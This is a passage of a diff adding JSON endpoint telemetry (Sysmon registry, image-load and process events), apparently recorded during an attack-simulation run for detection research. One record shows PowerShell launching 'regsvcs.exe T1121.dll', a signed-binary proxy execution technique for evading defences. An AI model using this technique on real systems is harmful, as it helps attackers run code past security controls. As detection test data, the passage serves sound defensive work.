"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "clrjit.dll", + "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570868250000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\SysWOW64\\kernel.appcore.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570870580000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "process", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "subtype": "terminate", + "timestamp": 131883570870740000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "command_line": "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe\" T1121.dll", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 1976, + "ppid": 7036, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "subtype": "create", + "timestamp": 131883570870840000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570870740000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\SysWOW64\\ntdll.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570870740000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570870740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wow64.dll", + "image_path": "C:\\Windows\\System32\\wow64.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570870740000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "wow64win.dll", + "image_path": "C:\\Windows\\System32\\wow64win.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "RegSvcs.exe", + "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570870740000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "wow64cpu.dll", + "image_path": "C:\\Windows\\System32\\wow64cpu.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "mscoree.dll", + "image_path": "C:\\Windows\\SysWOW64\\mscoree.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\SysWOW64\\KernelBase.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\SysWOW64\\advapi32.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\SysWOW64\\msvcrt.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\SysWOW64\\sechost.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\SysWOW64\\rpcrt4.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\SysWOW64\\sspicli.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "cryptbase.dll", + "image_path": "C:\\Windows\\SysWOW64\\cryptbase.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\SysWOW64\\bcryptprimitives.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + 